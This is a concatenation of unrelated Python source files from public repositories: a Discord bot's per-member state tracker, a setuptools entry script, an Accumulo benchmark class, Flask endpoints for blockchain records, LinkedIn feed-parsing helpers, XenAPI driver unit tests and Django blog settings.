d5d687a261f1ff22ddbc2e8327a32492a9ccd1d9 | 87fbca6990c8cb0185fdecae7ac70f931332f7f3 | /User.py | 0986dde0043f8c387e85834e55d02931fd14b1ec | [] | no_license | Sulfurixar/Elybot | 7dd09154e2f85ec7caf62efd710566bf7bf6965c | 0ccb2d248af055f811842ad4e3c20344f24b6801 | refs/heads/master | 2020-04-24T10:40:30.767517 | 2019-02-21T16:05:41 | 2019-02-21T16:05:41 | 171,901,717 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,340 | py | from Utils import Utils
import datetime
import discord
import json
import copy
import os
class User(object):
    """Per-guild-member state tracker persisted to ``<server>/users/<id>.json``.

    Records the member's mutable Discord attributes (name, roles, voice
    state, status, ...) as ``{'current': ..., 'previous': {timestamp: old}}``
    pairs, plus an hourly per-channel message-activity counter.
    """

    def __init__(self, data, server, user):
        # NOTE(review): config is written under server.user_path, but
        # load_user() only creates server.path / server.server_path --
        # confirm user_path always exists by that point.
        self.user_config_path = os.path.join(server.user_path, '{}.json'.format(user.id))
        self.user = user
        self.server = server
        self.data = data
        # Shape of a fresh per-user config; tracked attributes keep the last
        # value under 'current' and a timestamped history under 'previous'.
        self.config_template = {
            'id': user.id,
            'bot': user.bot,
            'created_at': user.created_at.strftime('%d-%m-%Y_%H-%M-%S-%f'),
            'name': {
                'current': '',
                'previous': {}
            },
            'discriminator': {
                'current': '',
                'previous': {}
            },
            'display_name': {
                'current': '',
                'previous': {}
            },
            'roles': {
                'current': {},
                'previous': {}
            },
            'voice': {
                'current': {},
                'previous': {}
            },
            'joined_at': {
                'current': '',
                'previous': {}
            },
            'status': {
                'current': '',
                'previous': {}
            },
            'game': {
                'current': {},
                'previous': {}
            },
            'colour': {
                'current': '',
                'previous': {}
            },
            'bans': {
                'current': 'not banned',
                'previous': {}
            },
            'activity': {}
        }
        self.config = self.load_user()
        self.update()

    def load_user(self):
        """Load this user's JSON config, creating directories/file as needed.

        Falls back to a fresh copy of the template when the file contains
        invalid JSON.
        """
        if not os.path.exists(self.server.path):
            os.mkdir(self.server.path)
        if not os.path.exists(self.server.server_path):
            os.mkdir(self.server.server_path)
        if not os.path.exists(self.user_config_path):
            self.write_config(conf=self.config_template)
        try:
            with open(self.user_config_path, 'r') as f:
                js = json.load(f)
        except ValueError:
            js = copy.deepcopy(self.config_template)
        return js

    def update_value(self, value, new_value, time=None):
        """Set ``config[value]['current']`` to *new_value*, archiving the old one.

        The previous value is stored in ``config[value]['previous']`` under
        *time* (default: now, via Utils.get_full_time_string). Empty old
        values ('' or {}) are not archived.
        """
        if time is None:
            time = Utils.get_full_time_string()
        if value not in self.config:
            self.config[value] = copy.deepcopy(self.config_template[value])
        if 'current' not in self.config[value]:
            self.config[value]['current'] = new_value
            return
        compare = True
        if isinstance(new_value, dict) and isinstance(self.config[value]['current'], dict):
            compare = self.comparer(new_value, self.config[value]['current'])
        if str(self.config[value]['current']) != str(new_value) and compare:
            if str(self.config[value]['current']) != '' \
                    and self.config[value]['current'] != {}:
                if 'previous' in self.config[value]:
                    self.config[value]['previous'].update({time: self.config[value]['current']})
                else:
                    self.config[value]['previous'] = {time: self.config[value]['current']}
            self.config[value]['current'] = new_value

    def comparer(self, dict1, dict2):
        """Return True if the two dicts differ (keys or values, recursively).

        Fix over the original: it tested ``dict1[key] is dict`` -- an identity
        comparison against the type object, which is always False -- so the
        recursive branch was dead code. ``isinstance`` restores the intent.
        """
        if len(dict1) != len(dict2):
            return True
        for key in dict1:
            if key not in dict2:
                return True
            if isinstance(dict1[key], dict) and isinstance(dict2[key], dict):
                if self.comparer(dict1[key], dict2[key]):
                    return True
            elif isinstance(dict1[key], dict) and not isinstance(dict2[key], dict):
                return True
            else:
                if dict1[key] != dict2[key]:
                    return True
        return False

    def update_activity(self, channel):
        """Increment the message counter for (year, month, day, hour, channel).

        Behaviourally identical to the original hand-rolled template
        insertion, but built with ``setdefault`` instead of ~40 lines of
        nested membership checks.
        """
        time = datetime.datetime.now()
        hour = str(time.hour)
        day = str(time.day)
        month = str(time.month)
        year = str(time.year)
        bucket = self.config.setdefault('activity', {})
        for key in (year, month, day, hour):
            bucket = bucket.setdefault(key, {})
        cid = str(channel.id)
        bucket[cid] = bucket.get(cid, 0) + 1

    def check_name(self):
        """Record the user's account name."""
        self.update_value('name', self.user.name)

    def check_display_name(self):
        """Record the user's display (nick) name."""
        self.update_value('display_name', self.user.display_name)

    def check_discriminator(self):
        """Record the user's discriminator."""
        self.update_value('discriminator', self.user.discriminator)

    def check_roles(self):
        """Record the user's roles as {role_id: role attributes}."""
        roles = {}
        for role in self.user.roles:
            roles[role.id] = {
                'name': role.name, 'permissions': role.permissions.value, 'colour': role.colour.value,
                'position': role.position, 'created_at': role.created_at.strftime('%d-%m-%Y_%H-%M-%S-%f')
            }
        self.update_value('roles', roles)

    def check_voice(self):
        """Record the user's voice state (mute/deaf flags and channel)."""
        state = {
            'server_deaf': self.user.voice.deaf,
            'server_mute': self.user.voice.mute,
            'self_mute': self.user.voice.self_mute,
            'self_deaf': self.user.voice.self_deaf,
            'is_afk': self.user.voice.is_afk,
        }
        if self.user.voice.voice_channel is not None:
            state['channel'] = {
                'id': self.user.voice.voice_channel.id,
                'name': self.user.voice.voice_channel.name,
                'private': self.user.voice.voice_channel.is_private
            }
        else:
            state['channel'] = {
                'id': None,
                'name': None,
                'private': None
            }
        self.update_value('voice', state)

    def check_joined_at(self):
        """Record the user's guild join timestamp."""
        self.update_value('joined_at', self.user.joined_at.strftime('%d-%m-%Y_%H-%M-%S-%f'))

    def check_status(self):
        """Record the user's presence status."""
        self.update_value('status', str(self.user.status))

    def check_game(self):
        """Record the user's current game/activity (name, url, type)."""
        game = {
            'name': None,
            'url': None,
            'type': None
        }
        if self.user.game is not None:
            game = {
                'name': self.user.game.name,
                'url': self.user.game.url,
                'type': self.user.game.type
            }
        self.update_value('game', game)

    def check_colour(self):
        """Record the user's display colour."""
        self.update_value('colour', self.user.colour.value)

    def check_config_values(self):
        """Refresh every tracked attribute; member-only ones are guarded."""
        self.check_name()
        self.check_discriminator()
        self.check_display_name()
        self.check_status()
        self.check_game()
        # NOTE(review): string comparison of types excludes Member
        # subclasses; kept as-is to preserve behaviour.
        if str(type(self.user)) == str(discord.member.Member):
            self.check_roles()
            self.check_voice()
            self.check_joined_at()
            self.check_colour()

    def write_config(self, conf=None):
        """Serialise *conf* (default: the live config) to the user's JSON file."""
        if conf is None:
            conf = self.config
        # `with` closes the file; the original's explicit f.close() inside
        # the with-block was redundant.
        with open(self.user_config_path, 'w+') as f:
            json.dump(conf, f, indent=4)

    def update(self):
        """Merge template keys into the config, refresh values, and persist."""
        Utils(self.data).update(copy.deepcopy(self.config_template), self.config)
        self.check_config_values()
        self.write_config()
| [
"[email protected]"
] | |
780964a1b244dc8494d1e94aa7ffa9022b5d450e | 540f1e3233b2bee5248ff95d65b6be4be53203b1 | /venv/bin/easy_install-3.6 | c4325e86f59b04b1da39d5ab5928c355714f6f08 | [] | no_license | ArijitR111Y/Python-programming-exercises | 2db108134d0109b2e1bb202fa54f36abab560972 | 6e4c258bb8d590db5ba527dde24e2fc67dcf7fd1 | refs/heads/master | 2020-03-26T17:34:17.830803 | 2018-10-28T06:56:15 | 2018-10-28T06:56:15 | 145,168,707 | 0 | 0 | null | 2018-08-17T21:37:45 | 2018-08-17T21:37:44 | null | UTF-8 | Python | false | false | 476 | 6 | #!/home/arijit/Documents/Github_Repos/Python-programming-exercises/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.6'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.6')()
)
| [
"[email protected]"
] | |
dd4d0d6c201679d893bb319a03af2a7033948222 | 31f4cab278d83a755f1e434f35273223b049d172 | /bugs/accumulo/5594b2e0/test/system/bench/lib/Benchmark.py | ae1fafcbabbaac4fae672042ac01f414b4e77712 | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | JenniferJohnson89/bugs_dot_jar_dissection | 2a017f5f77772ddb2b9a5e45423ae084fa1bd7a0 | 7012cccce9a3fdbfc97a0ca507420c24650f6bcf | refs/heads/main | 2022-12-28T16:38:18.039203 | 2020-10-20T09:45:47 | 2020-10-20T09:45:47 | 305,639,612 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,612 | py | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import unittest
import os
import glob
import sys
from options import log
from path import accumulo
class Benchmark(unittest.TestCase):
    """Base class for Accumulo benchmarks: timing, credentials, jar discovery."""

    username = ''
    password = ''
    zookeepers = ''
    instance = ''

    def __init__(self):
        unittest.TestCase.__init__(self)
        self.finished = None

    def name(self):
        """Return the concrete benchmark's class name."""
        return self.__class__.__name__

    def setUp(self):
        # verify accumulo is running
        self.start = time.time()

    def tearDown(self):
        self.stop = time.time()
        log.debug("Runtime: %.2f", self.stop - self.start)
        self.finished = True

    def runTime(self):
        """Wall-clock duration between setUp and tearDown."""
        return self.stop - self.start

    def score(self):
        """Runtime of a finished benchmark, or 0 if it never completed."""
        if self.finished:
            return self.runTime()
        return 0.

    # Each class that extends Benchmark should overwrite this
    def setSpeed(self, speed):
        # print() with one argument is valid on both Python 2 and 3.
        print("Classes that extend Benchmark need to override setSpeed.")

    def setUsername(self, user):
        self.username = user

    def getUsername(self):
        return self.username

    def setPassword(self, password):
        self.password = password

    def getPassword(self):
        return self.password

    def setZookeepers(self, zookeepers):
        self.zookeepers = zookeepers

    def getZookeepers(self):
        return self.zookeepers

    def setInstance(self, instance):
        self.instance = instance

    def getInstance(self):
        return self.instance

    def sleep(self, tts):
        time.sleep(tts)

    def needsAuthentication(self):
        return 0

    def findjar(self, path):
        """Return the first jar matching *path*, skipping javadoc/sources jars.

        Fix over the original: it called list.remove() while iterating the
        same list, which skips the element following each removal and could
        leave javadoc/sources jars in the result. Build a filtered list
        instead.
        """
        globjar = [j for j in glob.glob(path)
                   if 'javadoc' not in j and 'sources' not in j]
        return globjar[0]

    # Returns the location of the local examples jar
    def getexamplejar(self):
        return self.findjar(accumulo() + '/lib/accumulo-examples*.jar')

    # Returns a string of core, thrift and zookeeper jars with a specified delim
    def getjars(self, delim=','):
        accumulo_core_jar = self.findjar(accumulo('lib', 'accumulo-core*.jar'))
        accumulo_start_jar = self.findjar(accumulo('lib', 'accumulo-start*.jar'))
        accumulo_thrift_jar = self.findjar(accumulo('lib', 'libthrift*.jar'))
        accumulo_zookeeper_jar = self.findjar(os.path.join(os.getenv('ZOOKEEPER_HOME'), 'zookeeper*.jar'))
        return delim.join([accumulo_core_jar, accumulo_thrift_jar, accumulo_zookeeper_jar, accumulo_start_jar])

    # Builds the running command for the map/reduce class specified sans the arguments
    def buildcommand(self, classname, *args):
        return [accumulo('bin', 'accumulo'), classname, '-libjars', self.getjars()] + list(map(str, args))
| [
"[email protected]"
] | |
3d6106b6e7e3d37af803f11255cad2346a387720 | 434a76f2a39b6152e18f25c092e2d3e272bcaa7d | /api/views/blockchains/resources.py | b30b53e5a6ba756d1d935653476963c9e299f4e2 | [
"Apache-2.0"
] | permissive | DaCeige/machinaris | fce98168d0ec288b47c37662079cbb928975badc | 2d3837c8af00bb41162f8be1cbf6eaf1cb6c6fdb | refs/heads/main | 2023-08-24T13:10:22.511119 | 2021-10-07T18:55:25 | 2021-10-07T18:55:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,326 | py | import datetime as dt
from flask.views import MethodView
from api import app
from api.extensions.api import Blueprint, SQLCursorPage
from common.extensions.database import db
from common.models import Blockchain
from .schemas import BlockchainSchema, BlockchainQueryArgsSchema
# REST blueprint grouping every /blockchains endpoint.
blp = Blueprint(
    'Blockchains',
    __name__,
    url_prefix='/blockchains',
    description="Operations on blockchains"
)
@blp.route('/')
class Blockchains(MethodView):
    """Collection endpoint: list blockchains and create/upsert one."""

    @blp.etag
    @blp.arguments(BlockchainQueryArgsSchema, location='query')
    @blp.response(200, BlockchainSchema(many=True))
    @blp.paginate(SQLCursorPage)
    def get(self, args):
        # Filter by any combination of the validated query args.
        return db.session.query(Blockchain).filter_by(**args)

    @blp.etag
    @blp.arguments(BlockchainSchema)
    @blp.response(201, BlockchainSchema)
    def post(self, new_item):
        # Upsert keyed on (hostname, blockchain): update if present, else insert.
        item = db.session.query(Blockchain).filter(Blockchain.hostname==new_item['hostname'], \
            Blockchain.blockchain==new_item['blockchain']).first()
        if item: # upsert
            new_item['created_at'] = item.created_at
            new_item['updated_at'] = dt.datetime.now()
            BlockchainSchema().update(item, new_item)
        else: # insert
            item = Blockchain(**new_item)
            db.session.add(item)
        db.session.commit()
        return item
@blp.route('/<hostname>/<blockchain>')
class BlockchainsByHostname(MethodView):
    """Item endpoint for a single (hostname, blockchain) record.

    Fix over the original: the route declares two URL parameters, so every
    view method must accept both -- get/delete only took ``hostname`` and
    would raise a TypeError when Flask passed ``blockchain`` as well. The
    lookups also now use the composite (hostname, blockchain) key, matching
    the upsert in the collection endpoint.
    """

    @blp.etag
    @blp.response(200, BlockchainSchema)
    def get(self, hostname, blockchain):
        # NOTE(review): assumes the model's primary key is the composite
        # (hostname, blockchain) -- confirm against common.models.Blockchain.
        return db.session.query(Blockchain).get_or_404((hostname, blockchain))

    @blp.etag
    @blp.arguments(BlockchainSchema)
    @blp.response(200, BlockchainSchema)
    def put(self, new_item, hostname, blockchain):
        item = db.session.query(Blockchain).get_or_404((hostname, blockchain))
        new_item['hostname'] = item.hostname
        new_item['created_at'] = item.created_at
        new_item['updated_at'] = dt.datetime.now()
        blp.check_etag(item, BlockchainSchema)
        BlockchainSchema().update(item, new_item)
        db.session.add(item)
        db.session.commit()
        return item

    @blp.etag
    @blp.response(204)
    def delete(self, hostname, blockchain):
        item = db.session.query(Blockchain).get_or_404((hostname, blockchain))
        blp.check_etag(item, BlockchainSchema)
        db.session.delete(item)
        db.session.commit()
"[email protected]"
] | |
8ba11f2ef590038ba7088d6471103e17aea99a38 | 08301e2a1a775ddbb25cfe04c8ed62afcd9b428b | /utils/helpers.py | 2945b7b949339d9a18dde0d58d53e253b70a1c43 | [] | no_license | KateShapovalova/linkedin | 0a1f5f583bfdb57b1fdbb64a086eb0699aafca74 | 17885e4c8b7641b3487403dc1c656bcc3d025d0c | refs/heads/master | 2023-06-06T01:28:15.532775 | 2021-06-24T12:25:33 | 2021-06-24T12:25:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,800 | py | def get_id_from_urn(urn):
"""
Return the ID of a given Linkedin URN.
Example: urn:li:fs_miniProfile:<id>
"""
return urn.split(":")[3]
def get_urn_from_raw_update(raw_string):
"""
Return the URN of a raw group update
Example: urn:li:fs_miniProfile:<id>
Example: urn:li:fs_updateV2:(<urn>,GROUP_FEED,EMPTY,DEFAULT,false)
"""
return raw_string.split("(")[1].split(",")[0]
def get_update_author_name(d_included):
"""Parse a dict and returns, if present, the post author name
:param d_included: a dict, as returned by res.json().get("included", {})
:type d_included: dict
:return: Author name
:rtype: str
"""
try:
return d_included["actor"]["name"]["text"]
except KeyError:
return ""
except TypeError:
return "None"
def get_update_old(d_included):
"""Parse a dict and returns, if present, the post old string
:param d_included: a dict, as returned by res.json().get("included", {})
:type d_included: dict
:return: Post old string. Example: '2 mo'
:rtype: str
"""
try:
return d_included["actor"]["subDescription"]["text"]
except KeyError:
return ""
except TypeError:
return "None"
def get_update_content(d_included, base_url):
"""Parse a dict and returns, if present, the post content
:param d_included: a dict, as returned by res.json().get("included", {})
:type d_included: dict
:param base_url: site URL
:type base_url: str
:return: Post content
:rtype: str
"""
try:
return d_included["commentary"]["text"]["text"]
except KeyError:
return ""
except TypeError:
try:
urn = get_urn_from_raw_update(d_included["*resharedUpdate"])
return f"{base_url}/feed/update/{urn}"
except KeyError:
return "IMAGE"
except TypeError:
return "None"
def get_update_author_profile(d_included, base_url):
"""Parse a dict and returns, if present, the URL corresponding the profile
:param d_included: a dict, as returned by res.json().get("included", {})
:type d_included: dict
:param base_url: site URL
:type base_url: str
:return: URL with either company or member profile
:rtype: str
"""
try:
urn = d_included["actor"]["urn"]
except KeyError:
return ""
except TypeError:
return "None"
else:
urn_id = urn.split(":")[-1]
if "company" in urn:
return f"{base_url}/company/{urn_id}"
elif "member" in urn:
return f"{base_url}/in/{urn_id}"
def get_update_url(d_included, base_url):
    """Return the canonical feed URL of a post, if its URN is present.

    Returns ``""`` on a missing key and ``"None"`` on a non-subscriptable
    value, matching the sibling extractors.
    """
    try:
        urn = d_included["updateMetadata"]["urn"]
    except KeyError:
        return ""
    except TypeError:
        return "None"
    return f"{base_url}/feed/update/{urn}"
def append_update_post_field_to_posts_list(d_included, l_posts, post_key, post_value):
    """Attach one (key, value) post field to the list of posts being built.

    If the last post dict does not yet carry *post_key*, the value is added
    to it; otherwise (or when the list is empty) a new post dict is started.
    The list is mutated in place and also returned. ``d_included`` is unused
    but kept for signature compatibility with the callers.
    """
    if l_posts and post_key not in l_posts[-1]:
        l_posts[-1][post_key] = post_value
    else:
        l_posts.append({post_key: post_value})
    return l_posts
def parse_list_raw_urns(l_raw_urns):
    """Map each raw update string in *l_raw_urns* to its inner URN."""
    return [get_urn_from_raw_update(raw) for raw in l_raw_urns]
def parse_list_raw_posts(l_raw_posts, linkedin_base_url):
    """Assemble a list of post dicts from an unsorted list of raw post fields.

    Each raw item is probed with the field extractors in a fixed order;
    truthy results are folded into the running list via
    ``append_update_post_field_to_posts_list``.
    """
    l_posts = []
    for raw in l_raw_posts:
        extracted = (
            ("author_name", get_update_author_name(raw)),
            ("author_profile", get_update_author_profile(raw, linkedin_base_url)),
            ("old", get_update_old(raw)),
            ("content", get_update_content(raw, linkedin_base_url)),
            ("url", get_update_url(raw, linkedin_base_url)),
        )
        for field_key, field_value in extracted:
            if field_value:
                append_update_post_field_to_posts_list(raw, l_posts, field_key, field_value)
    return l_posts
def get_list_posts_sorted_without_promoted(l_urns, l_posts):
    """Return posts from *l_posts* ordered to match *l_urns*, excluding promoted posts.

    Promoted posts (whose "old" field contains "Promoted") are dropped first;
    then, for each URN, the first remaining post whose "url" contains that URN
    is moved to the result.  *l_posts* is modified in place: promoted and
    matched entries are removed from it.

    :param l_urns: List of posts URNs, in the desired output order
    :type l_urns: list
    :param l_posts: List of dicts, each one of them is a post (the "old" and
        "url" keys may be absent)
    :type l_posts: list
    :return: List of dicts, each one of them is a post
    :rtype: list
    """
    l_posts_sorted_without_promoted = []
    # Default missing keys to "" so that posts lacking "old"/"url" do not
    # raise TypeError/KeyError; they are simply treated as
    # non-promoted / non-matching.
    l_posts[:] = [d for d in l_posts if "Promoted" not in d.get("old", "")]
    for urn in l_urns:
        for post in l_posts:
            if urn in post.get("url", ""):
                l_posts_sorted_without_promoted.append(post)
                l_posts[:] = [d for d in l_posts if urn not in d.get("url", "")]
                break
    return l_posts_sorted_without_promoted
| [
"[email protected]"
] | |
eb072ee218d2a1895d7da00df4591fd81018b7c7 | 584db1be8b6bdedaa56d186692ad72da5ee07164 | /patron/tests/unit/virt/xenapi/test_driver.py | f8674f0cec1082ea4a77834f9a8001aa2c43c8e8 | [
"Apache-2.0"
] | permissive | casbin/openstack-patron | 66006f57725cf1c3d735cd5529d3459fd77384c8 | b41b1262f3a52c8cc9f6b6bdf87be5a1abcf6d25 | refs/heads/master | 2023-05-31T05:23:37.721768 | 2015-12-31T12:18:17 | 2015-12-31T12:18:17 | 382,054,546 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,308 | py | # Copyright (c) 2013 Rackspace Hosting
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import math
import mock
from oslo_utils import units
from patron.compute import arch
from patron.tests.unit.virt.xenapi import stubs
from patron.virt import driver
from patron.virt import fake
from patron.virt import xenapi
from patron.virt.xenapi import driver as xenapi_driver
class XenAPIDriverTestCase(stubs.XenAPITestBaseNoDB):
    """Unit tests for Driver operations."""

    def _get_driver(self):
        # Wire the driver to the fake in-memory XenAPI session so tests
        # never contact a real XenServer.
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVMTests)
        self.flags(connection_url='test_url',
                   connection_password='test_pass', group='xenserver')
        return xenapi.XenAPIDriver(fake.FakeVirtAPI(), False)

    def host_stats(self, refresh=True):
        # Canned host statistics used to stub out HostState.get_host_stats.
        return {'host_memory_total': 3 * units.Mi,
                'host_memory_free_computed': 2 * units.Mi,
                'disk_total': 5 * units.Gi,
                'disk_used': 2 * units.Gi,
                'disk_allocated': 4 * units.Gi,
                'host_hostname': 'somename',
                'supported_instances': arch.X86_64,
                'host_cpu_info': {'cpu_count': 50},
                'cpu_model': {
                    'vendor': 'GenuineIntel',
                    'model': 'Intel(R) Xeon(R) CPU X3430 @ 2.40GHz',
                    'topology': {
                        'sockets': 1,
                        'cores': 4,
                        'threads': 1,
                    },
                    'features': [
                        'fpu', 'de', 'tsc', 'msr', 'pae', 'mce',
                        'cx8', 'apic', 'sep', 'mtrr', 'mca',
                        'cmov', 'pat', 'clflush', 'acpi', 'mmx',
                        'fxsr', 'sse', 'sse2', 'ss', 'ht',
                        'nx', 'constant_tsc', 'nonstop_tsc',
                        'aperfmperf', 'pni', 'vmx', 'est', 'ssse3',
                        'sse4_1', 'sse4_2', 'popcnt', 'hypervisor',
                        'ida', 'tpr_shadow', 'vnmi', 'flexpriority',
                        'ept', 'vpid',
                    ],
                },
                'vcpus_used': 10,
                'pci_passthrough_devices': '',
                'host_other-config': {'iscsi_iqn': 'someiqn'}}

    def test_available_resource(self):
        # get_available_resource() should translate the raw host stats above
        # into the resource dict consumed by the scheduler.
        driver = self._get_driver()
        driver._session.product_version = (6, 8, 2)
        self.stubs.Set(driver.host_state, 'get_host_stats', self.host_stats)

        resources = driver.get_available_resource(None)
        self.assertEqual(6008002, resources['hypervisor_version'])
        self.assertEqual(50, resources['vcpus'])
        self.assertEqual(3, resources['memory_mb'])
        self.assertEqual(5, resources['local_gb'])
        self.assertEqual(10, resources['vcpus_used'])
        self.assertEqual(3 - 2, resources['memory_mb_used'])
        self.assertEqual(2, resources['local_gb_used'])
        self.assertEqual('xen', resources['hypervisor_type'])
        self.assertEqual('somename', resources['hypervisor_hostname'])
        self.assertEqual(1, resources['disk_available_least'])

    def test_overhead(self):
        driver = self._get_driver()
        instance = {'memory_mb': 30720, 'vcpus': 4}

        # expected memory overhead per:
        # https://wiki.openstack.org/wiki/XenServer/Overhead
        expected = ((instance['memory_mb'] * xenapi_driver.OVERHEAD_PER_MB) +
                    (instance['vcpus'] * xenapi_driver.OVERHEAD_PER_VCPU) +
                    xenapi_driver.OVERHEAD_BASE)
        expected = math.ceil(expected)
        overhead = driver.estimate_instance_overhead(instance)
        self.assertEqual(expected, overhead['memory_mb'])

    def test_set_bootable(self):
        # set_bootable() should delegate directly to the vmops layer.
        driver = self._get_driver()

        self.mox.StubOutWithMock(driver._vmops, 'set_bootable')
        driver._vmops.set_bootable('inst', True)
        self.mox.ReplayAll()

        driver.set_bootable('inst', True)

    def test_post_interrupted_snapshot_cleanup(self):
        # post_interrupted_snapshot_cleanup() should delegate to vmops with
        # the same arguments.
        driver = self._get_driver()
        fake_vmops_cleanup = mock.Mock()
        driver._vmops.post_interrupted_snapshot_cleanup = fake_vmops_cleanup

        driver.post_interrupted_snapshot_cleanup("context", "instance")

        fake_vmops_cleanup.assert_called_once_with("context", "instance")

    def test_public_api_signatures(self):
        # The XenAPI driver must expose the same public API as the base
        # ComputeDriver.
        inst = self._get_driver()
        self.assertPublicAPISignatures(driver.ComputeDriver(None), inst)

    def test_get_volume_connector(self):
        # The volume connector should report the connection IP and the
        # host's iSCSI initiator IQN taken from the host stats.
        ip = '123.123.123.123'
        driver = self._get_driver()
        self.flags(connection_url='http://%s' % ip,
                   connection_password='test_pass', group='xenserver')
        self.stubs.Set(driver.host_state, 'get_host_stats', self.host_stats)

        connector = driver.get_volume_connector({'uuid': 'fake'})
        self.assertIn('ip', connector)
        self.assertEqual(connector['ip'], ip)
        self.assertIn('initiator', connector)
        self.assertEqual(connector['initiator'], 'someiqn')

    def test_get_block_storage_ip(self):
        # When my_block_storage_ip is not configured differently from my_ip,
        # the host from the connection URL is used for block storage.
        my_ip = '123.123.123.123'
        connection_ip = '124.124.124.124'
        driver = self._get_driver()
        self.flags(connection_url='http://%s' % connection_ip,
                   group='xenserver')
        self.flags(my_ip=my_ip, my_block_storage_ip=my_ip)

        ip = driver._get_block_storage_ip()
        self.assertEqual(connection_ip, ip)

    def test_get_block_storage_ip_conf(self):
        # An explicitly configured my_block_storage_ip takes precedence
        # over the connection URL's host.
        driver = self._get_driver()
        my_ip = '123.123.123.123'
        my_block_storage_ip = '124.124.124.124'
        self.flags(my_ip=my_ip, my_block_storage_ip=my_block_storage_ip)

        ip = driver._get_block_storage_ip()
        self.assertEqual(my_block_storage_ip, ip)
| [
"[email protected]"
] | |
7a08948419da7bf634db355ebdf9a7f31dfd17f5 | cff22053a94d9c2b97fc0c0a420f627d8cb30cd4 | /Django2(only)_blog_one_with_comment/myfirst/myfirst/settings.py | 45288ea87136dd657a962acee896ef5f169e68a0 | [] | no_license | Pasha-lt/My-Project | a8636b8dff3fd748aaf8752024d33263aa42a60b | 57dd55ce910f259b9b434db5476361c967a1ca0f | refs/heads/master | 2022-12-13T04:51:52.877732 | 2020-07-13T17:29:09 | 2020-07-13T17:29:09 | 238,881,337 | 0 | 0 | null | 2022-12-08T03:47:23 | 2020-02-07T09:00:10 | CSS | UTF-8 | Python | false | false | 3,580 | py | """
Django settings for myfirst project.
Generated by 'django-admin startproject' using Django 2.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import sys

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
PROJECT_ROOT = os.path.dirname(__file__)
# Make the bundled "apps" directory importable as top-level packages.
sys.path.insert(0, os.path.join(PROJECT_ROOT, 'apps'))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): the key is hard-coded here; for production it should come
# from the environment instead of source control.
SECRET_KEY = '*y_1eykpk6pmryy5y&xga*#3y5+a(^vum&ec=zt%nl*f*zvd@1'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = []

# Application definition

INSTALLED_APPS = [
    'articles.apps.ArticlesConfig',  # register our hand-written application
    'grappelli',  # admin-skin library (listed before django.contrib.admin)
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'myfirst.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(PROJECT_ROOT, 'templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
                'django.template.context_processors.request',
            ],
        },
    },
]

WSGI_APPLICATION = 'myfirst.wsgi.application'

# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/

LANGUAGE_CODE = 'ru-RU'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/

STATIC_URL = '/static/'
